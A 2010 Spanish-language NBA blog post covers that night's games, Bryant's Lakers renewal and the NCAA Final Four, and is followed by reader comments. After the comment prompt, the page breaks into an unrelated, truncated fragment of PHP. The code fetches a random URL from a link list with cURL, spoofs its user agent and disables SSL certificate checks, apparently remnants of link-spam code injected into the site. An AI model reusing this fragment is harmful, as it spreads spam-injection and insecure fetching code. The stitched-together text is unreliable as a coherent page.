La Crónica (03/04/2010)

04 de April de 2010 por txusma

Con la March Madness en marcha muchos focos se han desplazado a Indianápolis dejando un tanto de lado la NBA. Recordemos que esta final a cuatro es uno de los eventos deportivos más vistos del país superando en ocasiones a las mismisimas finales de lod mayores. De todas maneras la jornada no se ha detenido y hemos podido disfrutar de un buen número de partidos.

Ha habido un par de partidos que destacan por encima del resto. Por un lado la paliza que los New Jersey Nets han propinado a unos Hornets que desde la vuelta de Chris Paul parece que no carburan tanto como se podía esperar. El mejor base de la liga para algunos, se quedó en 4 puntos en una horrible serie de 2 de 11 en tiro y da pie a todo tipo de especulaciones con respecto a su futuro. El otro partido destacó involucró a Thunder y Mavs y acabó con la “sorprendente” victoria de los primeros. Sorprendente entre comillas porque a estas alturas Durant y compañía no nos descubren nada pero no es fácil vencer a un equipazo como Dallas en su propia casa. Nowitzki estuvo soberbio pero sus compañeros parecen turnarse para acompañarse. Si no juegan todos al nivel que se les supone poco podrán hacer en Playoffs.

Los rivales de los Mavs en la lucha por la segunda plaza del Oeste corrieron suerte desigual. Los Nuggets ganaron a los Clippers remontando 21 puntos de diferencia y los Suns perdieron frente a unos Bucks que partido a partido nos cierran la boca a más de uno. La mala, malísima noticia para los de Skiles fue la lesión de Andrew Bogut tras una aparatosa caída que le hará perderse lo que resta de temporada. Nadar como locos para ahogarse en la orilla. Una lástima. Con las derrotas de Mavs y Suns y la victoria de los Nuggets estos 3 equipos más los Jazz s encuentran empatados en la segunda posición del Oeste en un juego por decidir los emparejamientos de primera ronda. Vosotros que preferiríais, ¿Thunder o Spurs?

En la otra loca carrera de la liga, los Bulls se impusieron a los Bobcats y los meten de lleno en la lucha por los Playoffs. Rose y Hinrich lideraron al equipo y lo mantienen vivo a pesar de los victoria de los Raptors, en la prórroga, frente a Philadelphia. Bosh se ha puesto definitivamente en plan serio. Miami también venció (a Minnessota) y evita verse envuelto en la trifulca.

Y en los partidos medio insulsos de la jornada, victoria de los Hawks frente Pistons, afirmando la tercera plaza del Este, y de Portland frente a Sacramento con Rudy quedándose de nuevo sin anotar…

De todas manera la noticia del día fue la renovación de Kobe Bryant por los Lakers durante 3 años más a cambio de unos 90 millones de dólares. De esta manera se pone fin a cualquier tipo de especulación y los aficionados amarillos pueden alegrarse de haber contado con el mejor juagdor de los últimos tiempos durante toda su carrera.

Y evidentemente, no podemos dejar de comentar por encima las semifinales de la NCAA. Butler venció a Michigan State con una gran defensa y Gordon Hayward como brazo ejecutor y Duke, con su Big Three particular (Singler, Scheyer y Nolan) pasó por encima de West Virginia. Los de Mike Krzyzewski son los máximos favoritos para alzarse esta noche con el título.

Comenta

9 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Pobre Lemontus, estará hecho polvo con lo de Bogut, ánimo Lemontus! 🙂
    Por qué los Nets despiertan ahora?
    Los mavs titubean demasiado, el coach sigue sin cogerle la tecla, aunque a nadie le gustaría cruzarse con ellos en PO

      Citar

  2. LEmontus dice:
    #2

    Bueno desde hoy despedirse que bucks soprenda en primera ronda…. una pena que mala suerte tiene esta franquicia….¿COMO SABEIS QUE SE PIERDE TODA LA TEMPORADA? tiene pinta de que sí pero no es oficial.

      Citar

  3. sergi237 dice:
    #3

    Una pena lo de Bogut http://www.marca.com/2010/04/04/baloncesto/nba/1270371081.html

    Soy el unico que cree que el año que viene los Nets van a ser aspirantes a ganarlo todo con la posible contratacion de Amare i el pick numero uno del draft?(wall o turner) harris-lee-turner-amare-brook

      Citar

  4. Love Denise dice:
    #4

    lemontus, no soy médico, pero la imagén escalofriante de bogut con el brazo al revés invita a pensar que hoy ha sido su último partido de la temporada. en este caso, una imagen vale más que mil diagnósticos.

      Citar

  5. LEmontus dice:
    #5

    Si tiene toda la pinta la verdad pero nunca se sabe soy optimista….xD Sergi yo tambien pienso que nets puede liarla el proximo año pero ten en cuenta que harris es candidato a irse. Pero pueden hacerse un equipazo increible

      Citar

  6. LEmontus dice:
    #6

    viendo la imagen en lo de marca está claro K.O en directo no me fijé en la mano… Ya está clarísimo o skiles hace maravillas y cambia el juego de bucks al 100% y kurt thomas ersan y Mbah juegan a su máximo nivel y por supuesto jennings termina de ser intermitente podrán asustar a alguien, pero bueno el mejor pivot de la liga se lesiona y hasta el momento amare estaba seco y desesperado.CONFIO EN JENNINGS.

    El año que viene nets tambien tendrá a terrence william(superado este año en el que no le han dado bola y cuando se la han dado ha jugado de forma excelente) con un increible talento y gradísimas defensas.

      Citar

  7. kantonyo dice:
    #7

    Lo de Bogut ha sido una pena, resta bastante competitividad en los playoffs del este. A ver si vuelve al mismo nivel que estaba demostrando. Me ha recordado a la caida de Rudy el año pasado.

    Ya me van entrando ganas de disfrutar de los Playoffs!!

      Citar

  8. CAMPO2 dice:
    #8

    Yo tambien espero que los Nets al año que viene se salgan, creeis que si eligen a john Wall, busque un traspaso para Harris?y asi conseguir un gran alero que es lo que necesitan porque con CDR, hayes no es suficiente.

      Citar

  9. Txusma dice:
    #9

    Y si en lugar de John Wall se decantan por Evan Turner? Tiene muy buena pinta este jugador tb…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>